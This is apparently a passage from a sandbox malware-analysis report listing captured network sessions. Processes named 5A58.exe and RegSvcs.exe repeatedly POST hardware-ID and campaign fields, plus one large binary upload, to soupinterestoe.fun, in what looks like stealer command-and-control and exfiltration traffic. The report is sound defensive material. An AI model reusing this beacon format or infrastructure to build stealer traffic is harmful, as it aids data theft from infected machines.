{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b5e8 Data Raw: Data Ascii:
Dec 27, 2023 17:58:12.070844889 CET	41	IN	Data Raw: 38 38 33 61 62 38 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 883ab8-DFW15Malformed packet data
Dec 27, 2023 17:58:12.070856094 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49811	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:11.986721992 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:11.986969948 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:12.365883112 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ft7vk1s3odqaqh4u0vel3igjat; expires=Sun, 21-Apr-2024 10:44:51 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jvqPUA3HVDntihVUt25r1r0SPRlVgg5DtjVdUQ0bDo6IGVwy%2Fpp9XFp%2BLJRXCN4AjhIUd0GQ2%2FpIHm27WARekvftKZKl8s1FI9xYc939TN10apT1FupWFu0qtWYX8nm0g%2F2EEcY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b615 Data Raw: Data Ascii:
Dec 27, 2023 17:58:12.365897894 CET	41	IN	Data Raw: 65 33 61 61 37 66 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: e3aa7f-DFW15Malformed packet data
Dec 27, 2023 17:58:12.365909100 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49813	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:12.302524090 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:12.302594900 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:12.692815065 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8lord9kibtva2eign1ur9u8mgt; expires=Sun, 21-Apr-2024 10:44:51 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tLhNctpsvQEDdGcOC9XV0WvBEabAor30DkS%2B5E8er495Djvn3%2Fo8w3jNzvE8P2UagxXMcn4RuACKIpFzMsAXLBM5UG3o%2FIGiylNaUK5V7FgQnRAEFnB4DboyHYFSIye4F4ELvb8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b634cd Data Raw: Data Ascii:
Dec 27, 2023 17:58:12.692837000 CET	39	IN	Data Raw: 36 62 39 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6b94-DFW15Malformed packet data
Dec 27, 2023 17:58:12.692848921 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49814	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:12.637609005 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:12.637803078 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:13.023166895 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=cvt32gl4aafmmukp3mib7hu5m4; expires=Sun, 21-Apr-2024 10:44:51 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cNtwRUMVC7UCBbB14q5RQM0F%2BgnPFZYFKZmdI5cJHk8ehrgbvNlNznxulisId2RDxomYpcaFl2EqpbDpI5iSkEUSut1VU%2BN2EI6IwMinmeckCCBgbuWDcPC8r%2F9EOrEnU9sAxV0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b6568f Data Raw: Data Ascii:
Dec 27, 2023 17:58:13.023189068 CET	39	IN	Data Raw: 32 65 37 32 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 2e72-DFW15Malformed packet data
Dec 27, 2023 17:58:13.023202896 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49815	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:12.956685066 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:12.956733942 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:13.340704918 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=c5to9lg4l1k9uf7de6phni5qoh; expires=Sun, 21-Apr-2024 10:44:52 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hpukkz77moJ4%2FiZuz4smlA4qDBimTENTjHG6ksyOzDDr3fObcbxVRIuFuZGjQsrcf6BKb5EbpozFgQVvOuXUoDiApBRQxy8xsyLi7tHwTWe8%2FiWxMTEN%2FIGXAnR7oYHa9K%2FIeeA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b676 Data Raw: Data Ascii:
Dec 27, 2023 17:58:13.340732098 CET	41	IN	Data Raw: 39 31 36 63 33 66 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 916c3f-DFW15Malformed packet data
Dec 27, 2023 17:58:13.340744019 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49817	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:13.651206017 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:13.652713060 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:14.191342115 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=qd3ngh05jekhc5e66n7coujcgi; expires=Sun, 21-Apr-2024 10:44:53 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fZMYBHYvHV1b%2FiYiPmFhvu322aSglOMUR2IKG%2BVjPr%2FNk7X17NPYuVoA%2FDnHvU3vZOE9P%2BIchQByf4R2DTGsO8A6EZnKWuem309So8D2fY6h0x60TSDalLc99fQQWZ6oPlle6po%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b6 Data Raw: Data Ascii:
Dec 27, 2023 17:58:14.191354990 CET	43	IN	Data Raw: 62 64 31 35 33 35 38 61 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: bd15358a-DFW15Malformed packet data
Dec 27, 2023 17:58:14.191406012 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49819	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:14.347126007 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:14.347377062 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:14.730704069 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=3figu8nk141vi5sq007apgld88; expires=Sun, 21-Apr-2024 10:44:53 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JPxXKEVpX1Sxgis3xEquEyZh%2Fi0LbCWQPP0GEcQTB%2BQzylMyuR6B3cIS6EvhTq84PjTpaAM4ur%2BqAd2FHZYksRkAF13aKOYoVe2lhtTufickZc89EV1OIULiKlunfPulGAA8DfA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b701d6 Data Raw: Data Ascii:
Dec 27, 2023 17:58:14.730717897 CET	39	IN	Data Raw: 36 62 62 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6bb3-DFW15Malformed packet data
Dec 27, 2023 17:58:14.730729103 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49820	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:14.458126068 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20453 Host: soupinterestoe.fun
Dec 27, 2023 17:58:14.458210945 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:14.579132080 CET	1286	OUT	Data Raw: 7c 99 d9 ef 59 b2 d3 79 eb 41 f2 6a 2e fa c0 bc bd 7b c3 59 a9 1d df 7f 5a eb bb ee 3a 6f 67 0e f5 3b d8 cd 95 36 76 1a 97 98 ec ba a2 17 06 db f3 9c db d8 7f 9f d5 cd f5 eb 7a cb a5 5d 5d d6 e7 b3 d1 23 53 af ee 5a 43 6a dd 72 d6 12 07 fb f5 b5 Data Ascii: \|YyAj.{YZ:og;6vz]]#SZCjrVxcG#ke3Q_}GD6euZvcO">3'G6gu:'Gi~f~4?Tvd}K~;j4Y{<vo}j+RXz/v-Kt.M
Dec 27, 2023 17:58:14.579164982 CET	7593	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 7e e6 0d a5 06 12 bb 6e 99 fd cc e1 b3 d9 f6 db cc 4d bf 76 39 d3 7e fb d0 bd 7f fd b9 81 f6 db c7 16 5e 78 30 dd 7e fb e1 57 3f f0 a1 54 fb ed 57 0b 57 be 91 cc a5 06 72 bb 6e b9 34 fe bd df 1d 8a da cb 86 b3 Data Ascii: ~nMv9~^x0~W?TWWrn4A"Q5'1W-+/^8+1+1uZuqYIFo?~?n(o!T.
Dec 27, 2023 17:58:15.048039913 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ksm9ncbfu2crb64t1ekt0lor9s; expires=Sun, 21-Apr-2024 10:44:53 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rSe0ly5T%2FNogpRxA%2FMpymyGPrcTb%2BCzaal9WbB6%2BbcUq7burW9%2FWGmKDer7i%2BzgJNA8ESQv1cQdLY2Q6%2BUew%2FcRf24pptcPTQQZZgfacwatD%2BL76ddYzQ5z9Pq4t65w9vVpFofo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: Data Raw: Data Ascii:
Dec 27, 2023 17:58:15.048054934 CET	44	IN	Data Raw: 38 33 63 33 31 62 37 30 63 62 32 30 36 63 34 36 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 83c31b70cb206c46-DFWfok 212.102.41.2
Dec 27, 2023 17:58:15.048065901 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49821	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:15.321813107 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:15.322779894 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:15.706716061 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=tc3sf7dnt2gucom111ja00aogg; expires=Sun, 21-Apr-2024 10:44:54 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iwg%2FpSJ151RzVoEA5ysO8glZJPYxhNJih38pSLmkbeAuKYjEU910JrEXxw3mOUEXJNVv3nz6S0VihuWb92B1vUqqQ4%2FrWiMdJ0gsAsaA9GyYI05p5ZUCQr6QaTWjcfXzInHpNwY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b7628fb6 Data Raw: Data Ascii:
Dec 27, 2023 17:58:15.706741095 CET	37	IN	Data Raw: 64 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: dd-DFW15Malformed packet data
